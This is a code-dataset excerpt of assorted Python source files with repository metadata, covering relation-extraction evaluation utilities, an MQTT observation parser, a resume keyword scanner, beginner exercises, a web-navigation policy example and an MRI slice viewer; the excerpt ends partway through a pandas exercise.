blob_id
stringlengths 40
40
| directory_id
stringlengths 40
40
| path
stringlengths 3
281
| content_id
stringlengths 40
40
| detected_licenses
listlengths 0
57
| license_type
stringclasses 2
values | repo_name
stringlengths 6
116
| snapshot_id
stringlengths 40
40
| revision_id
stringlengths 40
40
| branch_name
stringclasses 313
values | visit_date
timestamp[us] | revision_date
timestamp[us] | committer_date
timestamp[us] | github_id
int64 18.2k
668M
⌀ | star_events_count
int64 0
102k
| fork_events_count
int64 0
38.2k
| gha_license_id
stringclasses 17
values | gha_event_created_at
timestamp[us] | gha_created_at
timestamp[us] | gha_language
stringclasses 107
values | src_encoding
stringclasses 20
values | language
stringclasses 1
value | is_vendor
bool 2
classes | is_generated
bool 2
classes | length_bytes
int64 4
6.02M
| extension
stringclasses 78
values | content
stringlengths 2
6.02M
| authors
listlengths 1
1
| author
stringlengths 0
175
|
---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
08127b0f0ef5d039bc990b80c5d5b65c8a2e79f6 | e67acbdd7659cd1070d1c1a8be3192e2f673f855 | /utils.py | 1457eed5bcb3be03ec609bf395f268f7e6d87546 | []
| no_license | Kafu-Chino/PCNN | 9dc1c1499f448368bd6ae57829251ac5e4c66acd | 164ee7efaf03ba5fa18a6741a50cde2b9d545940 | refs/heads/master | 2021-04-10T10:18:29.949819 | 2020-03-27T07:38:05 | 2020-03-27T07:38:05 | 248,929,325 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,053 | py | #!/usr/bin/env python
# -- coding: utf-8 --
# @Time : 2020/3/22 22:54
# Author : Hu
# File : utils.py
import numpy as np
import time
def now():
    """Return the current local time formatted as 'YYYY-MM-DD HH:MM:SS'."""
    # time.strftime already returns a str, so no extra conversion is needed.
    return time.strftime('%Y-%m-%d %H:%M:%S')
def save_pr(out_dir, name, epoch, pre, rec, fp_res=None, opt=None):
    """Write precision/recall pairs (and optional false-positive records) to disk.

    Keyword arguments:
    out_dir -- directory for the output files
    name -- model/run name used in the file names
    epoch -- zero-based epoch; file names use epoch + 1
    pre, rec -- parallel sequences of precision and recall values
    fp_res -- optional iterable of (index, relation, probability) false positives,
              written to '<name>_<epoch+1>_FP.txt'
    opt -- optional tag inserted into the PR file name
    """
    if opt is None:
        pr_path = '{}/{}_{}_PR.txt'.format(out_dir, name, epoch + 1)
    else:
        pr_path = '{}/{}_{}_{}_PR.txt'.format(out_dir, name, opt, epoch + 1)
    if fp_res is not None:
        # Context managers guarantee the handles are closed even if a write fails
        # (the original leaked both files on exception).
        with open('{}/{}_{}_FP.txt'.format(out_dir, name, epoch + 1), 'w') as fp_out:
            for idx, r, p in fp_res:
                fp_out.write('{} {} {}\n'.format(idx, r, p))
    with open(pr_path, 'w') as out:
        for p, r in zip(pre, rec):
            out.write('{} {}\n'.format(p, r))
def eval_metric(true_y, pred_y, pred_p):
'''
Calculate precision/recall points for a P-R curve, neglecting the NA relation.
true_y -- per-instance label tuples; true_y[i][0] == 0 marks the NA relation,
and a -1 entry terminates the valid labels inside a tuple.
pred_y -- predicted relation id per instance (0 == NA).
pred_p -- per-instance confidence; instances are swept in descending order.
Returns (precisions, recalls, fp_res) where fp_res holds false positives as
(instance index, predicted relation, score) triples.
'''
assert len(true_y) == len(pred_y)
# Number of non-NA instances: the denominator of recall.
# NOTE(review): positive_num == 0 would raise ZeroDivisionError below.
positive_num = len([i for i in true_y if i[0] > 0])
# Sweep instances from the most to the least confident prediction.
index = np.argsort(pred_p)[::-1]
tp = 0
fp = 0
fn = 0
# Seeded with 0 so the dedup comparison below always has a previous point;
# the seeds are stripped from the returned lists.
all_pre = [0]
all_rec = [0]
fp_res = []
for idx in range(len(true_y)):
i = true_y[index[idx]]
j = pred_y[index[idx]]
if i[0] == 0: # NA relation
if j > 0:
fp_res.append((index[idx], j, pred_p[index[idx]]))
fp += 1
else:
if j == 0:
fn += 1
else:
# A prediction is a TP if it matches any gold label before the -1 terminator.
for k in i:
if k == -1:
break
if k == j:
tp += 1
break
# Precision is defined as 1.0 before the first positive prediction.
if fp + tp == 0:
precision = 1.0
else:
precision = tp * 1.0 / (tp + fp)
recall = tp * 1.0 / positive_num
# Record a new curve point only when it differs from the previous one.
if precision != all_pre[-1] or recall != all_rec[-1]:
all_pre.append(precision)
all_rec.append(recall)
print("tp={}; fp={}; fn={}; positive_num={}".format(tp, fp, fn, positive_num))
return all_pre[1:], all_rec[1:], fp_res | [
"[email protected]"
]
| |
9af8ed039c844e9b466786e5d8b703d49786ae92 | cb79ccd823e4a40fce3534d8fb8ba9094e08a5b8 | /Model/category.py | 4084a855416dcb83ab04fd199e533a50e631ae4d | [
"MIT"
]
| permissive | ouldevloper/booksmanagement | 55b811f03b499415da341fd44fb6de89223fd1d8 | ca518107c178c326c091a16d7a2348c0c29a44ca | refs/heads/main | 2023-03-27T19:51:33.286285 | 2021-04-03T00:34:11 | 2021-04-03T00:34:11 | 352,447,646 | 2 | 0 | null | null | null | null | UTF-8 | Python | false | false | 461 | py | # @Author: Abdellah Oulahyane
# @Date: 2021-03-24 07:01:27
# @Last Modified by: Abdellah Oulahyane
# @Last Modified time: 2021-03-28 04:11:31
# @Contact fb.com/maruki00
from Model.sys.Model import Model
class Category(Model):
"""ORM-style record for a book category: an id plus label/description."""
def __init__(self,
id=None,
label=None,
description=None
):
# NOTE: `id` mirrors the database column name although it shadows the builtin.
self.id = id
self.label = label
self.description = description | [
"[email protected]"
]
| |
8ff2f9ed975a03f1b78428458c00fce26ec0d025 | ccf4a743d32a1babda3cbca1d0f622340179527f | /PythonPushGui/GuiHome.py | 38f4383588c4648a91eabf7c6f0948ff7c8aed4b | []
| no_license | zbo/zbodo | 678226a630eb49f2587d3b3cac62745930600188 | 98c7f3f6e76bd769ff0a6ed3f7117a49bbf015cd | refs/heads/master | 2021-05-19T02:57:40.375642 | 2020-04-23T07:35:50 | 2020-04-23T07:35:50 | 17,794,106 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,420 | py | import wx
# Python 2 / Twisted push-server bootstrap (urllib2 and print-statement era).
import urllib2
import ConnectStrings
import GetClientIdHandler
import StatusManager
import AddToStreamHandler
import XmlProcess
import PushServer
from twisted.protocols import basic
from twisted.internet import reactor, protocol, defer
import datetime
from xml.sax import make_parser,SAXException
# Serve the push protocol on TCP port 8081.
f = PushServer.protocol.ServerFactory()
f.protocol =PushServer.WebPUSH
reactor.listenTCP(8081, f)
# Blocks here until the reactor is stopped; everything below is commented-out
# legacy client code and is never executed.
reactor.run()
#req_GetClientId = ConnectStrings.GetString_ServerHeader()+'?'+ConnectStrings.GetString_GetClientId()
#print req_GetClientId
#
#getClientIdHandler=GetClientIdHandler.GetClientIdHandler()
#parser=make_parser()
#parser.setContentHandler(getClientIdHandler)
#parser.parse(req_GetClientId)
#print StatusManager.StatusManager.clientId
#
#req_AddStream=ConnectStrings.GetString_ServerHeader()+'?'+ConnectStrings.GetString_AddToStream()
#print req_AddStream
#addToStreamHandler=AddToStreamHandler.AddToStreamHandler()
#parser2=make_parser()
#parser2.setContentHandler(addToStreamHandler)
#
#url=req_AddStream
#StatusManager.StatusManager.stream=urllib2.urlopen(url)
#tagList=[]
#str=''
#while 1:
# char=StatusManager.StatusManager.stream.read(1)
# if char=='<':
# nextChar=StatusManager.StatusManager.stream.read(1)
# while nextChar!='>':
# str+=nextChar
# nextChar=StatusManager.StatusManager.stream.read(1)
# XmlProcess.ProcessNode(str)
# str=''
| [
"[email protected]"
]
| |
fb45ef36d57123365e9570c7d00c7a49809b7ec6 | 6e4c6cc1ee81e7c6486b3a6509bd21c38aaa6072 | /monica/jobs/acquisition/messageacquisition.py | b1b7fc1ca71276f90a1556ba4784e6246b088254 | [
"Apache-2.0"
]
| permissive | MONICA-Project/HLDFAD_SourceCode | 42a8011a3a7ef6fc3b7bb1bfd4a83c3154316db5 | 94748f20d104bb00e3a71f485dfd8199b7d7dc69 | refs/heads/master | 2022-01-20T10:32:47.712389 | 2020-03-04T15:58:36 | 2020-03-04T15:58:36 | 243,544,736 | 1 | 0 | Apache-2.0 | 2022-01-06T22:43:05 | 2020-02-27T15:04:17 | Python | UTF-8 | Python | false | false | 5,064 | py | from jobs.models import CrowdDensityLocalObservation, Localization
import logging
from dateutil.parser import isoparse
from utility.utility_catalog_cached import UtilityCatalogCached
from typing import Dict, Any
import json
logger = logging.getLogger('textlogger')
class MessageAcquisition:
LABEL_DATASTREAM = "Datastream"
LABEL_IOTID = "@iot.id"
LABEL_RESULT = "result"
LABEL_PHENOMENONTIME = "phenomenonTime"
@staticmethod
def mics_observation(j_data, pilot_name):
return
@staticmethod
def crowd_density_local_observation(mqtt_dictionary: Dict[str, Any],
pilot_name: str,
observable_id: int) -> CrowdDensityLocalObservation:
try:
if MessageAcquisition.LABEL_DATASTREAM not in mqtt_dictionary.keys() \
or MessageAcquisition.LABEL_IOTID not in mqtt_dictionary[MessageAcquisition.LABEL_DATASTREAM]:
return None
if MessageAcquisition.LABEL_RESULT not in mqtt_dictionary or not mqtt_dictionary[MessageAcquisition.LABEL_RESULT]:
return None
# FIXME: The field extracted is the Observable identifier NOT the datastream id
# (NOTE: it is not actually used)
datastream_id = mqtt_dictionary[MessageAcquisition.LABEL_DATASTREAM][MessageAcquisition.LABEL_IOTID]
iot_id = mqtt_dictionary[MessageAcquisition.LABEL_DATASTREAM][MessageAcquisition.LABEL_IOTID]
json_result = mqtt_dictionary[MessageAcquisition.LABEL_RESULT]
# Create Observation
crowd_density_local = CrowdDensityLocalObservation()
crowd_density_local.set_pilot_name(pilot_name=pilot_name)
crowd_density_local.set_datastream_id(datastream_id=datastream_id)
crowd_density_local.set_observable_id(observable_id=observable_id)
crowd_density_local.set_obs_iot_id(iot_id=iot_id)
if not crowd_density_local.from_dictionary(dictionary=json_result):
del crowd_density_local
return None
device_registration = UtilityCatalogCached.\
get_device_registration(datastream_id=crowd_density_local.get_datastream_id())
if not device_registration:
logger.warning('crowd_density_local_observation Unable To Find DeviceRegistration. Abort')
del crowd_density_local
return None
if not crowd_density_local.set_info_registration(device_registration=device_registration):
del crowd_density_local
return None
logger.info('CROWD DENSITY LOCAL OBSERVATION SAVED INFO: {}'.format(crowd_density_local.to_trace_string()))
return crowd_density_local
except Exception as ex:
# logger.exception(ex)
logger.error('CROWD DENSITY LOCAL REGISTRATION EXCEPTION: {0}'.format(ex))
@staticmethod
def localization_observation(mqtt_dictionary: Dict[str, Any],
pilot_name: str,
observable_id: int = 0,
running_id: int = 0) -> Localization:
try:
if not mqtt_dictionary:
return None
if MessageAcquisition.LABEL_RESULT not in mqtt_dictionary:
logger.error('localization observation Error. Probably received GOST Message, JSON: {}'
.format(json.dumps(mqtt_dictionary)))
return None
json_result = mqtt_dictionary[MessageAcquisition.LABEL_RESULT]
timestamp = mqtt_dictionary[MessageAcquisition.LABEL_PHENOMENONTIME]
datastream_id = 0
json_datastream = mqtt_dictionary[MessageAcquisition.LABEL_DATASTREAM]
if MessageAcquisition.LABEL_IOTID in json_datastream:
datastream_id = json_datastream[MessageAcquisition.LABEL_IOTID]
iot_id = json_datastream[MessageAcquisition.LABEL_IOTID]
else:
logger.warning("UNABLE TO FIND OBS_ID in Datastream")
loc_observation = Localization()
loc_observation.from_dictionary(dictionary=json_result)
loc_observation.timestamp = isoparse(timestamp)
loc_observation.set_pilot_name(pilot_name=pilot_name)
loc_observation.set_datastream_id(datastream_id=datastream_id)
loc_observation.set_observable_id(observable_id=observable_id)
loc_observation.set_obs_iot_id(iot_id=iot_id)
loc_observation.run_id = running_id
loc_observation.save()
return loc_observation
except Exception as ex:
logger.error('MessAcquisit localization_observation Exception: {0}'.format(ex))
return None
@staticmethod
def flow_observation(j_data, pilot_name):
logger.debug(j_data)
@staticmethod
def weareables_observation(j_data):
logger.debug(j_data)
| [
"[email protected]"
]
| |
a8b3d3d08593ea6f9f48b305c4117d8e4a37ed90 | 5b92536804e0abd77e0385e78c5412173c0829b6 | /resume_parsing.py | d2e54450e609de224956a8b64a9fb035cea0cdff | []
| no_license | deepikavemuri/pythonPractise | f2a1e51460b3f647583fde36f0cf0818c1a75095 | f16c663bb8c09f557edf2418a6a6b990e2a77853 | refs/heads/main | 2023-03-04T20:10:39.909848 | 2021-02-03T07:39:56 | 2021-02-03T07:39:56 | 335,537,508 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 605 | py | import nltk
import os
# Folder of plain-text resumes to scan for job keywords.
resume_folder = '/home/anantharam/Deepika/Resumes_text'
resumes = os.listdir(resume_folder)
for resume_path in resumes:
document = open(resume_folder + "/" + resume_path)
x = document.read()
# Flatten the resume into a single line before tokenizing.
x = x.replace("\n", " ")
print(x)
job_keyWords = ['Python', 'C', 'Finance']
#lines = x.split('\n')
#words = []
s = ""
# temp = open(keyword_content, 'a+')
words = nltk.word_tokenize(x)
print(words)
for word in words:
if word in job_keyWords:
# One index file per keyword; each matching resume's name is appended.
f = open(word+'.txt', 'a+')
#print(s)
# NOTE(review): `temp` is never defined (its assignment above is commented
# out), so this raises NameError on the first keyword match. The handles
# `document` and `f` are also never explicitly closed on all paths.
if word not in temp:
s += word
f.write(resume_path + ",")
f.close() | [
"[email protected]"
]
| |
2ed205c312b02dc19f7009c9b2b26de639d25969 | dede18db20fd47c3059bcbf74562e8773096821e | /advent/2019/3/advent1.py | 9e9514de476c5fa21130d1855c5b72d8f43406eb | []
| no_license | conradoboeira/CP | a70232d916c04d81c93f84de70afb2f252cff4ad | 675b098a1c62c7d9bcfa5d8d9a2d7e359b24eef2 | refs/heads/master | 2020-03-31T19:55:21.417786 | 2020-02-18T03:56:40 | 2020-02-18T03:56:40 | 152,518,258 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,794 | py | line1 = input().split(',')
# Advent of Code 2019 day 3: trace two wires from the origin and report the
# Manhattan distance of the crossing closest to the origin.
line2 = input().split(',')
pts_marked = []
pt= (0,0)
# First wire: mark every grid point it covers.
# NOTE(review): membership tests against this list below are O(n) per probe;
# a set would make the second pass dramatically faster.
for com in line1:
direction = com[0]
dist = int(com[1:])
if(direction == 'R'):
end_point = (pt[0]+ dist, pt[1])
if(direction == 'L'):
end_point = (pt[0]- dist, pt[1])
if(direction == 'U'):
end_point = (pt[0], pt[1] + dist)
if(direction == 'D'):
end_point = (pt[0], pt[1]- dist)
if(direction == 'R'):
for i in range (pt[0], end_point[0]+1):
pts_marked.append((i, pt[1]))
elif(direction == 'L'):
for i in range (pt[0], end_point[0]-1, -1):
pts_marked.append((i, pt[1]))
elif(direction == 'U'):
for i in range (pt[1], end_point[1]+1):
pts_marked.append((pt[0], i))
else:
for i in range (pt[1], end_point[1]-1, -1):
pts_marked.append((pt[0], i))
pt = end_point
print(pts_marked)
closer_pt = -1
pt = (0,0)
# Second wire: walk its points and track the closest intersection.
# NOTE(review): `dist` below shadows the segment length parsed from `com`.
for com in line2:
direction = com[0]
dist = int(com[1:])
if(direction == 'R'):
end_point = (pt[0]+ dist, pt[1])
if(direction == 'L'):
end_point = (pt[0]- dist, pt[1])
if(direction == 'U'):
end_point = (pt[0], pt[1] + dist)
if(direction == 'D'):
end_point = (pt[0], pt[1]- dist)
if(direction == 'R'):
for i in range (pt[0], end_point[0]+1):
point = (i, pt[1])
if point in pts_marked:
#print(point)
dist = abs(point[0]) + abs(point[1])
if(closer_pt == -1 or dist < closer_pt):
if(pt == (0,0)): continue
closer_pt = dist
elif(direction == 'L'):
for i in range (pt[0], end_point[0]-1, -1):
point = (i, pt[1])
if point in pts_marked:
#print(point)
dist = abs(point[0]) + abs(point[1])
if(closer_pt == -1 or dist < closer_pt):
if(pt == (0,0)): continue
closer_pt = dist
elif(direction == 'U'):
for i in range (pt[1], end_point[1]+1):
# NOTE(review): `(pt[0], 1)` looks like a typo for `(pt[0], i)` —
# the vertical branches never probe the actual walked coordinate.
point = (pt[0], 1)
if point in pts_marked:
#print(point)
dist = abs(point[0]) + abs(point[1])
if(closer_pt == -1 or dist < closer_pt):
if(pt == (0,0)): continue
closer_pt = dist
else:
for i in range (pt[1], end_point[1]-1, -1):
# NOTE(review): same suspected typo as the 'U' branch above.
point = (pt[0], 1)
if point in pts_marked:
#print(point)
dist = abs(point[0]) + abs(point[1])
if(closer_pt == -1 or dist < closer_pt):
if(pt == (0,0)): continue
closer_pt = dist
print(end_point)
pt = end_point
print(closer_pt)
| [
"[email protected]"
]
| |
71c99974459ee5974e36e755091f0d37914ff64c | 87b55dd99e9828bed011fd7cf0a3cf059d70d391 | /pythonPractice/ex26.py | 9d6dc85354bd28fb93c4f707f95c16c35e6007d3 | []
| no_license | David-GaTre/Python-the-hard-way | f2945a84b07a3c35d0d8d8f2b9e53b514043d9c9 | 558c7986b655b9f951181b73ac2de62a1e19d7dd | refs/heads/master | 2022-01-18T09:43:28.303865 | 2019-08-04T07:21:53 | 2019-08-04T07:21:53 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,285 | py | def break_words(stuff):
"""This function will break up words for us."""
words = stuff.split(' ')
return words
def sort_words(words):
    """Return a new list with the words in ascending order."""
    ordered = sorted(words)
    return ordered
def print_first_word(words):
"""Prints the first word after popping it off."""
word = words.pop(0)
print word
def print_last_word(words):
"""Prints the last word after popping it off."""
word = words.pop(-1)
print word
def sort_sentence(sentence):
    """Split a full sentence into words and return them sorted."""
    return sort_words(break_words(sentence))
def print_first_and_last(sentence):
    """Print the first and the last word of *sentence*."""
    remaining = break_words(sentence)
    print_first_word(remaining)
    print_last_word(remaining)
def print_first_and_last_sorted(sentence):
    """Sort the sentence's words, then print the first and last of them."""
    ordered = sort_sentence(sentence)
    print_first_word(ordered)
    print_last_word(ordered)
print "Let's practice everything."
print 'You\'d need to know \'bout escapes with \\ that do \n newlines and \t tabs.'
poem = """
\tThe lovely world
with logic so firmly planted
cannot discern \n the needs of love
nor comprehend passion from intuition
and requires an explantion
\n\t\twhere there is none.
"""
print "--------------"
print poem
print "--------------"
five = 10 - 2 + 3 - 6
print "This should be five: %s" % five
def secret_formula(started):
    """Derive jelly-bean, jar and crate counts from a starting number."""
    beans = started * 500
    jars = beans / 1000
    crates = jars / 100
    return beans, jars, crates
start_point = 10000
beans, jars, crates = secret_formula(start_point)
print "With a starting point of: %d" % start_point
# NOTE(review): "jeans" in the next output string looks like a typo for "beans".
print "We'd have %d jeans, %d jars, and %d crates." % (beans, jars, crates)
# Integer (floor) division under Python 2.
start_point = start_point / 10
print "We can also do that this way:"
print "We'd have %d beans, %d jars, and %d crabapples." % secret_formula(start_point)
# Exercise the word helpers defined above on a sample sentence.
sentence = "All good things come to those who weight."
words = break_words(sentence)
sorted_words = sort_words(words)
print_first_word(words)
print_last_word(words)
print_first_word(sorted_words)
print_last_word(sorted_words)
sorted_words = sort_sentence(sentence)
print sorted_words
print_first_and_last(sentence)
print_first_and_last_sorted(sentence) | [
"[email protected]"
]
| |
72fb24a240291a432d20c7b10d1f829948019281 | ccf324383bce0a74ef3a4eca9f277e9db89800bb | /Chp8/8-3_exercises.py | 0bba55f4dd698b068f18ad00a90cd7d1a4abef43 | []
| no_license | tanktoptony/RealPython-Book1 | 825ef822cee8593bb80a95a840bda0a8214ea311 | 0c3cd79edf9e61236b0164e52d212d0bbd208c5a | refs/heads/master | 2021-01-12T00:39:53.717091 | 2015-04-16T08:51:45 | 2015-04-16T08:51:45 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 522 | py | # 1. Write a script that prompts the user to enter a word using the raw_input() function,
# stores that input in a string object, and then displays whether the length of that string
# is less than 5 characters, greater than 5 characters, or equal to 5 characters by using a
# set of if, elif and else statements.
#1
user_input = raw_input("Enter a word: ")
if len(user_input) < 5:
print 'less that 5 characters'
elif len(user_input) > 5:
print 'greater that 5 characters'
else:
print 'equal to 5 characters' | [
"[email protected]"
]
| |
9bdfba61deccc4c6699bd54280a7728fb4b4069a | 9612c53a9e666ba10510962a833a55fb7553be7b | /getDataSafir/jsonToCsv.py | 6a2c199030293c790470a6ac6c375484ec09da6f | []
| no_license | raksmeyny/big-data | 04098ed6fc6c51e9643c2dba0ee30f4c38d143ce | 1222edd5ca59a3d04ad3ac4dd444bea4cfd727e6 | refs/heads/master | 2021-01-10T04:53:57.905212 | 2016-03-14T04:15:14 | 2016-03-14T04:15:14 | 52,132,443 | 2 | 0 | null | null | null | null | UTF-8 | Python | false | false | 482 | py | import csv
import json
with open('comment.json') as x:
x = json.load(x)
print x
with open('data.csv','a') as f:
csvfile=csv.writer(f)
for item in x:
csvfile.writerow([item["date"],item["comment"],item["link"],item["likes"]]);
# f = csv.writer(open("comment.csv", "w+"))
# f.writerow(["date", "comment", "link", "likes"])
# for x in x:
# f.writerow([x["date"],
# x["comment"],
# x["link"],
# x["likes"]])
| [
"raksmey.ny"
]
| raksmey.ny |
f15ea5350f91db08607111b1b3da17afdb7e9df0 | e10a6d844a286db26ef56469e31dc8488a8c6f0e | /compositional_rl/gwob/examples/web_environment_example.py | db65accda519a7ce01ec591613e7c7d0385b57be | [
"Apache-2.0",
"CC-BY-4.0"
]
| permissive | Jimmy-INL/google-research | 54ad5551f97977f01297abddbfc8a99a7900b791 | 5573d9c5822f4e866b6692769963ae819cb3f10d | refs/heads/master | 2023-04-07T19:43:54.483068 | 2023-03-24T16:27:28 | 2023-03-24T16:32:17 | 282,682,170 | 1 | 0 | Apache-2.0 | 2020-07-26T15:50:32 | 2020-07-26T15:50:31 | null | UTF-8 | Python | false | false | 6,400 | py | # coding=utf-8
# Copyright 2022 The Google Research Authors.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Example execution of a rule-based optimal policy on gminiwob shopping."""
import time
from absl import app
from absl import flags
from absl import logging
from CoDE import test_websites
from CoDE import utils
from CoDE import vocabulary_node
from CoDE import web_environment
flags.DEFINE_string("data_dep_path", None,
"Data dep path for local miniwob files.")
flags.DEFINE_boolean(
"run_headless_mode", False,
"Run in headless mode. On borg, this should always be true.")
flags.DEFINE_boolean(
"use_conceptual", False,
"If true, use abstract web navigation where it is assumed to known which profile field corresponds to which element."
)
FLAGS = flags.FLAGS
def run_policy_on_shopping_website():
"""Run a rule-based optimal policy on the shopping website and visualize it.

Builds a generic GMiniWoB environment, turns it into a difficulty-3 shopping
website, then walks a hand-written sequence of element ids, issuing one
environment step per matched DOM element and accumulating the reward.
"""
# Create a generic web environment to which we will add primitives and
# transitions to create a shopping website. These parameters will work to
# observe a simple policy running but they might be insufficient in a training
# setting as observations will be converted into arrays and these parameters
# are used to shape them. In this example, they don't have that effect.
env = web_environment.GMiniWoBWebEnvironment(
base_url="file://{}/".format(FLAGS.data_dep_path),
subdomain="gminiwob.generic_website",
profile_length=5,
number_of_fields=5,
use_only_profile_key=False,
number_of_dom_elements=150,
dom_attribute_sequence_length=5,
keyboard_action_size=5,
kwargs_dict={
"headless": FLAGS.run_headless_mode,
"threading": False
},
step_limit=25,
global_vocabulary=vocabulary_node.LockedVocabulary(),
use_conceptual=FLAGS.use_conceptual)
# Create a shopping website design with difficulty = 3.
website = test_websites.create_shopping_website(3)
design = test_websites.generate_website_design_from_created_website(
website)
# Design the actual environment.
env.design_environment(
design, auto_num_pages=True)
# Make sure raw_state=True as this will return raw observations not numpy
# arrays.
state = env.reset(raw_state=True)
# Optimal sequences of elements to visit. Some might be redundant and will be
# skipped.
optimal_actions = [
"group_next_p0",
"group_username",
"group_password",
"group_rememberme",
"group_captcha",
"group_stayloggedin",
"group_next_p1",
"group_next_p2",
"group_name_first",
"group_name_last",
"group_address_line1",
"group_address_line2",
"group_city",
"group_postal_code",
"group_state",
"group_submit_p2",
]
# Corresponding pages of these elements:
# [0, 1, 1, 1, 1, 1, 1, 2, 3, 3, 3, 3, 3, 3, 3, 3]
reward = 0.0
logging.info("Utterance: %s", str(state.utterance))
logging.info("\n\n")
logging.info("All available primitives: %s",
str(env.get_all_actionable_primitives()))
logging.info("\n\n")
# Iterate over all optimal actions. For each action, iterate over all elements
# in the current observation. If an element matches, execute the optimal
# action and continue.
# Iterate over optimal actions.
for action in optimal_actions:
logging.info("Element at focus: %s", str(action))
# Iterate over all elements in the current observation.
# order_dom_elements returns an ordered list of DOM elements to make the
# order and elements consistent.
for i, element in enumerate(
utils.order_dom_elements(state.dom_elements, html_id_prefix=None)):
# If the HTML id of the element matches the action, execute the action.
if element.id == action.replace("group", "actionable"):
logging.info("Acting on (%s)", str(element))
logging.info("\tAttributes of the element: %s",
str(utils.dom_attributes(element, 5)))
# Get the corresponding profile fields.
profile_keys = env.raw_profile.keys
# Execute the (element index, profile field index) action on the
# website. Environment step function accepts a single scalar action.
# We flatten the action from a tuple to a scalar which is deflattened
# back to a tuple in the step function.
if action[len("group") +
1:] in profile_keys and not FLAGS.use_conceptual:
logging.info("Profile: %s, Element ID: %s",
str(profile_keys.index(action[len("group") + 1:])),
str(action[len("group") + 1:]))
# action=element_index + profile_field_index * number_of_elements
# This is converted back into a tuple using a simple modulo
# arithmetic.
state, r, _, _ = env.step(
i + profile_keys.index(action[len("group") + 1:]) *
env.number_of_dom_elements, True)
else: # This is the case where we have abstract navigation problem.
logging.info("Element ID: %s", str(action[len("group") + 1:]))
# We don't need to convert a tuple into a scalar because in this case
# the environment expects the index of the element.
state, r, _, _ = env.step(i, True)
logging.info("Current reward: %f", r)
reward += r
if not FLAGS.run_headless_mode:
# wait 1 sec so that the action can be observed on the browser.
time.sleep(1)
break
logging.info("Final reward: %f", reward)
if not FLAGS.run_headless_mode:
# wait 30 secs so that the users can inspect the html in the browser.
time.sleep(30)
def main(argv):
  """Script entry point; rejects unexpected positional CLI arguments."""
  if len(argv) > 1:
    raise app.UsageError("Too many command-line arguments.")
  run_policy_on_shopping_website()


if __name__ == "__main__":
  app.run(main)
| [
"[email protected]"
]
| |
d9c783ad8abf89d55348ad7b4a292cdac5bbf359 | 91a0bfacb61ae681860c560ba52ac09df4910b8f | /Codes/visualize.py | 6289ddbd090a1437bbe538404c0c01dd6a2e14a9 | [
"LicenseRef-scancode-unknown-license-reference",
"MIT"
]
| permissive | AayushKadam/brain_age | 98609293827778b978215b9d681f521fdab6d948 | 8a768e29046d525fdef3d57a58c742b52ed6f8e7 | refs/heads/master | 2021-10-15T19:18:22.779808 | 2019-02-05T20:12:46 | 2019-02-05T20:12:46 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,366 | py | import os
import matplotlib.pyplot as plt
import numpy as np
import random
#import scipy.ndimage
def show_slices(slices):
    """Display a row of 2-D image slices side by side in grayscale.

    Keyword arguments:
    slices -- sequence of 2-D arrays, one subplot each
    """
    fig, axes = plt.subplots(1, len(slices))
    # `idx`/`img` instead of the original loop name, which shadowed the
    # builtin `slice`.
    for idx, img in enumerate(slices):
        # Transposing with origin="lower" puts the array's first axis on
        # the horizontal screen axis.
        axes[idx].imshow(img.T, cmap="gray", origin="lower")
def rot90(m, k=1, axis=2):
    """Rotate an array by k*90 degrees counter-clockwise around the given axis."""
    # Bring the target axis into position 2, rotate in the leading plane,
    # then restore the original axis order.
    view = np.swapaxes(m, 2, axis)
    view = np.rot90(view, k)
    return np.swapaxes(view, 2, axis)
# Load two saved brain volumes and show their three mid-plane slices.
#first = np.load('data2\\1#(65, 65, 55).npy')
"""
X_before = 5
npad = ((5, 5), (0, 0), (0, 0))
first = np.pad(first, pad_width=npad, mode='constant', constant_values=0)
startz = 65//2-(55//2)
first = first[0:65,0:65, startz:startz+55]
"""
first = np.load('data2\\85#(65, 65, 55).npy')
#first = np.load('mean_img2.npy')
second = np.load('shuffled2\\45#(65, 65, 55).npy')
#first = rot90(first, 3, 0)
#first = rot90(first, 1, 2)
print(first.shape)
# Middle slice along each of the three axes of the first volume.
show_slices([
first[int(first.shape[0]/2), :, :],
first[:, int(first.shape[1]/2), :],
first[:, :, int(first.shape[2]/2)]])
plt.show()
# Same mid-plane views for the second volume.
show_slices([second[int(second.shape[0]/2), :, :],
second[:, int(second.shape[1]/2), :],
second[:, :, int(second.shape[2]/2)]])
plt.show()
| [
"[email protected]"
]
| |
e9155963542c0338f2e00c360ebb229b888acae0 | 439f1b3e2e7a454abd2cfac99d3074ba02405c09 | /code.py | 9c2f9842cf2aaa24cd16140cf0d7ad625a5414ae | [
"MIT"
]
| permissive | saikrishnan255/extracting-business-insights | 10c1286fafa41d59907b7b9afabf39fdd1300c56 | b79922148bd1aa80bea9d3571456f2891f06c713 | refs/heads/main | 2023-02-04T16:03:35.220099 | 2020-12-22T11:30:22 | 2020-12-22T11:30:22 | 323,607,104 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 6,061 | py | # --------------
import pandas as pd
import numpy as np
import matplotlib.pyplot as plt
# NOTE(review): `path` is not defined anywhere in this file; it is presumably
# injected by the hosting platform before execution — confirm before running
# standalone.
df = pd.read_csv(path)
def visual_summary(type_, df, col):
    """Summarize the data using a visual method.

    Draws the given column with the requested pandas plot kind and shows
    the resulting figure.

    Keyword arguments:
    type_ -- visualization method to be used (pandas plot `kind`)
    df -- the dataframe
    col -- the column in the dataframe to be summarized
    """
    # The original placed this docstring *after* the body, where it was a
    # dead string expression and never became __doc__.
    df[col].plot(kind=type_)
    plt.show()
def central_tendency(type_, df, col):
    """Calculate the measure of central tendency.

    Keyword arguments:
    type_ -- 'mean', 'median' or 'mode'
    df -- the dataframe
    col -- the column in the dataframe to do the calculations

    Returns:
